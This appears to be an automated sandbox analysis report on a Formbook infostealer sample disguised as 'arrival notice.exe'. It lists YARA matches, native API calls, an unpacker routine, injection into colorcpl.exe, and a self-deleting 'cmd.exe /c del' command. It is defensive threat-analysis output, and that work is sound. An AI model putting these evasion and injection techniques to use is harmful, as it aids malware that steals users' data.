          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: arrival notice.exe
          .NET source code contains very large stringsShow sources
          Source: arrival notice.exe, Form1.csLong String: Length: 38272
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.csLong String: Length: 38272
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.csLong String: Length: 38272
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.csLong String: Length: 38272
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.csLong String: Length: 38272
          Source: arrival notice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_009DE6181_2_009DE618
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_009DE6121_2_009DE612
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B8DB3_2_0041B8DB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041C1363_2_0041C136
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041D2293_2_0041D229
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00408C6B3_2_00408C6B
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00408C703_2_00408C70
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B720A010_2_04B720A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5B09010_2_04B5B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C120A810_2_04C120A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5841F10_2_04B5841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0100210_2_04C01002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7258110_2_04B72581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B5D5E010_2_04B5D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B40D2010_2_04B40D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C11D5510_2_04C11D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B6412010_2_04B64120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B4F90010_2_04B4F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12D0710_2_04C12D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12EF710_2_04C12EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C122AE10_2_04C122AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B66E3010_2_04B66E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B7EBB010_2_04B7EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C0DBD210_2_04C0DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C11FF110_2_04C11FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04C12B2810_2_04C12B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B8DB10_2_0097B8DB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097C13610_2_0097C136
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097D22910_2_0097D229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00968C7010_2_00968C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00968C6B10_2_00968C6B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962D9010_2_00962D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962D8710_2_00962D87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00962FB010_2_00962FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04B4B150 appears 35 times
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004185CA NtCreateFile,3_2_004185CA
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041867C NtReadFile,3_2_0041867C
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186FB NtClose,3_2_004186FB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004187AC NtAllocateVirtualMemory,3_2_004187AC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04B89860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89840 NtDelayExecution,LdrInitializeThunk,10_2_04B89840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899A0 NtCreateSection,LdrInitializeThunk,10_2_04B899A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895D0 NtClose,LdrInitializeThunk,10_2_04B895D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04B89910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89540 NtReadFile,LdrInitializeThunk,10_2_04B89540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_04B896E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B896D0 NtCreateKey,LdrInitializeThunk,10_2_04B896D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04B89660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89650 NtQueryValueKey,LdrInitializeThunk,10_2_04B89650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A50 NtCreateFile,LdrInitializeThunk,10_2_04B89A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89780 NtMapViewOfSection,LdrInitializeThunk,10_2_04B89780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89FE0 NtCreateMutant,LdrInitializeThunk,10_2_04B89FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89710 NtQueryInformationToken,LdrInitializeThunk,10_2_04B89710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898A0 NtWriteVirtualMemory,10_2_04B898A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B898F0 NtReadVirtualMemory,10_2_04B898F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89820 NtEnumerateKey,10_2_04B89820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8B040 NtSuspendThread,10_2_04B8B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B895F0 NtQueryInformationFile,10_2_04B895F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B899D0 NtCreateProcessEx,10_2_04B899D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8AD30 NtSetContextThread,10_2_04B8AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89520 NtWaitForSingleObject,10_2_04B89520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89560 NtWriteFile,10_2_04B89560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89950 NtQueueApcThread,10_2_04B89950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A80 NtOpenDirectoryObject,10_2_04B89A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A20 NtResumeThread,10_2_04B89A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89610 NtEnumerateValueKey,10_2_04B89610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A10 NtQuerySection,10_2_04B89A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89A00 NtProtectVirtualMemory,10_2_04B89A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89670 NtQueryInformationProcess,10_2_04B89670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A3B0 NtGetContextThread,10_2_04B8A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B897A0 NtUnmapViewOfSection,10_2_04B897A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89730 NtQueryVirtualMemory,10_2_04B89730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A710 NtOpenProcessToken,10_2_04B8A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89B00 NtSetValueKey,10_2_04B89B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89770 NtSetInformationFile,10_2_04B89770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B8A770 NtOpenThread,10_2_04B8A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B89760 NtOpenProcess,10_2_04B89760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785D0 NtCreateFile,10_2_009785D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978680 NtReadFile,10_2_00978680
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787B0 NtAllocateVirtualMemory,10_2_009787B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00978700 NtClose,10_2_00978700
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009785CA NtCreateFile,10_2_009785CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786FB NtClose,10_2_009786FB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097867C NtReadFile,10_2_0097867C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009787AC NtAllocateVirtualMemory,10_2_009787AC
          Source: arrival notice.exe, 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000000.347284510.00000000002C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000001.00000002.381149131.0000000002647000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.450859153.0000000000B62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs arrival notice.exe
          Source: arrival notice.exe, 00000003.00000002.452694295.0000000003463000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs arrival notice.exe
          Source: arrival notice.exeBinary or memory string: OriginalFilenameIsolatedStora.exeh$ vs arrival notice.exe
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: arrival notice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\arrival notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\arrival notice.exe 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\arrival notice.exeProcess created: C:\Users\user\Desktop\arrival notice.exe C:\Users\user\Desktop\arrival notice.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\arrival notice.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/3
          Source: C:\Users\user\Desktop\arrival notice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_01
          Source: arrival notice.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\arrival notice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: arrival notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: arrival notice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: arrival notice.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.arrival notice.exe.220000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.arrival notice.exe.ac0000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.arrival notice.exe.ac0000.1.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 1_2_0022297F push 20000001h; retf 1_2_00222992
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00412A95 pushfd ; retf 3_2_00412A96
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00415BB5 push eax; retf 3_2_00415BBB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_004186CA push edx; retn 0076h3_2_004186CB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0040169B push es; iretd 3_2_0040169D
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00414EA9 push es; ret 3_2_00414EAB
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 3_2_00AC297F push 20000001h; retf 3_2_00AC2992
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_04B9D0D1 push ecx; ret 10_2_04B9D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B812 push eax; ret 10_2_0097B818
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B81B push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B87C push eax; ret 10_2_0097B882
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00972A95 pushfd ; retf 10_2_00972A96
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00975BB5 push eax; retf 10_2_00975BBB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0096169B push es; iretd 10_2_0096169D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_00974EA9 push es; ret 10_2_00974EAB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_009786CA push edx; retn 0076h10_2_009786CB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_0097B7C5 push eax; ret 10_2_0097B818
          Source: initial sampleStatic PE information: section name: .text entropy: 7.50720151133

          Hooking and other Techniques for Hiding and Protection: